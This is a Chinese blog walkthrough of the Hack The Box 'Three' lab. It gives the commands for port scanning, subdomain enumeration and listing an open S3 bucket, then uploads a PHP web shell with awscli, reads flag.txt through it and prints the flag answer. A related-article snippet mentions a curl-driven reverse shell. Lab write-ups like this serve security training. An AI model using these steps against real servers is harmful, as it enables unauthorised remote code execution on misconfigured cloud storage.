Hack the box-Three

最新推荐文章于 2024-04-20 22:53:02 发布
最新推荐文章于 2024-04-20 22:53:02 发布
阅读量204 收藏
点赞数
文章标签: 网络安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ka_li12/article/details/132642865
版权

靶机地址10.129.110.15

端口扫描

输入: Nmap -sC -sV 10.129.110.15

-sC  使用默认脚本扫描

-sV  探测服务/版本信息

通过扫描发现22和80端口开放

答案: 2

答案: thetoppers.htb

通过浏览网页即可收集到该信息

答案: /etc/hosts

修改hosts文件,将域名与IP对应

子域名扫描

答案: s3.thetoppers.htb

使用gobuster对目标进行子域名扫描

gobuster vhost -u http://thetoppers.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain

将s3.thetoppers.htb加入hosts文件

再次访问页面

Amazon S3

答案: Amazon S3

Amazon Simple Storage Service (Amazon S3) 是由 Amazon Web Services (AWS) 提供的公共云服务。Amazon S3 通过简单的 Web 服务接口提供对象存储。它被广泛用于存储照片,视频,文本文件,文档,PDF文件,并存储大量数据的备份。

我们可以使用awscli工具对该服务进行交互

答案: awscli

安装awscli: apt-get install awscli

答案: aws configure

使用tldr aws查看该工具的用法

答案: aws s3 ls

使用tldr aws s3查看该工具的用法

答案: php

输入: aws s3 --endpoint=http://s3.thetoppers.htb ls s3://thetoppers.htb 查看当前目录下的文件, 发现一个index.php

上传shell

我们可以使用aws s3 cp/mv test-file.txt s3://bucket-name命令对目标上传shell

输入: aws s3 --endpoint=http://s3.thetoppers.htb cp shell.php s3://thetoppers.htb 上传shell

aws s3 --endpoint=http://s3.thetoppers.htb ls s3://thetoppers.htb 查看shell是否上传成功

访问页面进行操作

ls 查看当前目录下的文件

ls ../查看上级目录下的文件

cat ../flag.txt 查看flag.txt

 

答案: a980d99281a28d638ac68b9bf9453c2b

Wav3_Wind50r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB (hackthebox)Coder Insane靶机 User Flag WriteUp
qq_58869808的博客
04-06 8522
HTB Coder 靶机 UserFlag WriteUp
Hack-The-Box-Three
ffff5的博客
04-17 521
Hack The Box初级靶机Three通关记录!
Hackthebox Three
lixiangshidie的博客
12-29 691
hackthebox three
Hack The Box - Three(新手友好)
weixin_45793727的博客
08-12 3746
thetoppers.htb应该是域名,把域名和IP加到hosts文件中,tee命令的作用就是读取标准输入内容,将读取到的内容数据写入到标准输出和文件中。看看s3s3是亚马逊云存储的简单存储服务,全程是Simple Storage Service。如果成功的话可以看到我们监听的页面,如果没反弹成功可以看看10.10.16.60:8090是否有我们的shell.sh文件。我们通过命令执行shell,curl执行bash脚本反弹shell来实现命令行交互。生成bash一句话shell.sh。......
0x03-HackTheBox-Shield
0pr
04-22 540
Shield Video Walkthrough!???? 个人博客地址 Via今天回来继续 HackTheBox 系列。有事耽误了两天。前两天发现 Vaccine 这个机器老是会出现网络问题,我就跳过不做了。那么今天就是 Shield。 目标机器在IP地址 10.10.10.29。 Recon Nmap 只有 80 和 3306 端口开着,一个网站,加一个 mysql server。 攻击者可以继...
Haystack - hack the box
neal1991的专栏
11-30 580
Introduction Target: 10.10.10.115(Linux) Kali: 10.10.16.61 HayStack is an easy box in hack the box. But it does isn't easy at all. It's annoying to find the user and password in the messy Spanis...
Hack The Box-Dancing
ffff5的博客
10-07 859
Hack The Box 基础靶场-Dancing通关记录
Hack The Box - STARTING POINT
小小郭的博客
03-06 2405
Hack The Box - STARTING POINT
hack the box three
07-28
- *1* [Hackthebox Three](https://blog.csdn.net/lixiangshidie/article/details/128482447)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_...
HTB Lame[Hack The Box HTB靶场]writeup系列1
重新启程
02-01 2930
首先祈祷一下SARS病情尽快过去,武汉加油!湖北加油! 为了不给国家添乱,所以我在HTB订阅了VIP,准备搞下Retired Machines的靶机。 目录 0x00 靶场介绍 0x01 扫描端口 0x02 ftp服务 0x03 smb服务 0x00 靶场介绍 我们从第一个lame开始。 如何注册账号,购买vip,网上有大把文章,这里我就不再记录了。 这个系列主要是...
Tier 1 - Three
qq_21116067的博客
10-01 2780
Hack The Box - Tier 1 - Three
s3存储容器与awscli的交互
山兔的博客
11-02 999
通常,不同的子域将具有不同的IP地址,因此当我们的系统查找子域时,它会获取处理该应用程序的服务器的地址。因此,我们可以尝试将 PHP shell 文件上传到s3存储桶,因为它已上传到Webroot目录我们可以在浏览器中访问此网页,而浏览器又将执行此文件,我们将实现远程代码执行。有不同的枚举工具可用于此目的,如gobuster,wfuzz等等,在撰写本文时,我们将使用以下命令在对子域枚举的时候。我们看到文件index.php,.htaccess和一个名为images的目录在指定的存储桶中。
HTB_Three之aws s3拿shell
网络安全学习
08-27 2313
太久没打靶机又多了一个 又突破我的知识上限了
Hackthebox Trikc攻略
qq_44641654的博客
10-13 549
HTB Trick通关姿势
Hack The Box 1基础(1-5)
最新发布
qq_22792465的博客
04-20 949
答案:-x(sudo gobuster dir -u host -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,js,bak)aws s3 --endpoint=http://s3.thetoppers.htb ls s3://thetoppers.htb 查看是否上传。答案:../../../../../../../../windows/system32/drivers/etc/hosts。
连接hack the box教程
zr1213159840的博客
03-14 1万+
毕业论文终于告一段落了,虽然不是终版,但是终于能有点时间回来接着学点东西了,今天来连接hack the box靶场。 首先打开hack the box网址,然后注册,登录进去,开启靶场的话需要连接到hack the box。看右上角。 点击右上角,能看到有三种连接方式 我是使用kali进行连接的,所以点击第一个Machines 有两个选项,点击第一个openvpn,这个kali是自带这个功能的,我们点进去后,vpnaccess以及vpnserver都选择好,点击download vpn 然后会下载一
hackthebox的网站使用教程
Ba1_Ma0的博客
03-20 1万+
Google浏览器下载 下载url:https://www.google.cn/chrome/ hackthebox网站 网站url:https://www.hackthebox.com/home 获取验证码注册教程 网站url:https://blog.csdn.net/qq_45951598/article/details/115269108 然后我们进入网站的首页,这里我们演示的是旧ui,新ui的使用方法与旧的大致相同 使用google浏览器可以自动翻译网站上的英文,右击,然后选择翻译中文
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8456
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 Reel虚拟机是以恶意软件传播为主题的,这是一个很常见但危险的网络攻击。在解决这个靶场时,你需要进行全面的信息搜集,发现可能的漏洞,并利用这些漏洞来控制系统。你还需要进行各种网络嗅探和流量分析操作,以便找到系统中的隐藏服务和登录凭证。 在攻击过程中,你需要利用各种漏洞包括未经授权的访问和远程执行代码等。还需要理解和使用不同的入侵技术,例如命令注入和文件上传等。此外,你可能还需要对恶意软件的分析和行为进行深入研究,以了解其运行机制。 HackTheBox - Reel不仅测试了你的渗透测试技能,而且还促使你加强对恶意软件攻击和防护的了解。同时,这个靶场还有很多高级技术和技巧需要掌握。通过挑战这样的虚拟机,你可以提高你的安全意识和技能,以应对更复杂和高级的网络攻击。 总之,HackTheBox - Reel是一个非常有挑战性的虚拟机靶场,通过攻击和渗透测试,你将提高你的安全技能,并了解到如何防范和对抗恶意软件传播。这是一个很好的方式来锻炼和提升你的网络安全技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值